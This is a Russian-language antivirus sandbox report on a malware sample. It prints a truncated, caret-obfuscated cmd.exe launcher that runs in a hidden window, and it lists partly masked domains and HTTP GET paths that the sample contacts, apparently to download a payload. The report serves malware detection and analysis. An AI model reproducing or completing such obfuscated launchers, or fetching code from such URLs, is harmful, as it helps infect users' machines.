Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' cXYmaWjCUP KzMAkNmfjvBKSPBdFqThJ tAvKUutsEEPWhN & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %cKdKZtBCwrYsLsw%=KFEzifvUsiZAC&&set %FjdKtbV%=p&&set %iQfXBvCI%=o^...
Сетевая активность
Подключается к
- 'ap##ram.biz':80
- 'at###-reisen.de':80
- 'ba###n-reise.de':80
- 'se#####haus-bayern.de':80
- 'ar####ndustrie.com':80
TCP
Запросы HTTP GET
- http://ap##ram.biz/N3MYTmV/
- http://at###-reisen.de/MGhE4/
- http://ba###n-reise.de/SFn3YY/
- http://www.se#####haus-bayern.de/SFn3YY/
- http://ar####ndustrie.com/RUErH/
UDP
- DNS ASK ap##ram.biz
- DNS ASK at###-reisen.de
- DNS ASK ba###n-reise.de
- DNS ASK se#####haus-bayern.de
- DNS ASK ar####ndustrie.com
- DNS ASK de##vo.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' cXYmaWjCUP KzMAkNmfjvBKSPBdFqThJ tAvKUutsEEPWhN & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %cKdKZtBCwrYsLsw%=KFEzifvUsiZAC&&set %FjdKtbV%=p&&set %iQfXBvCI%=o^...' (со скрытым окном)
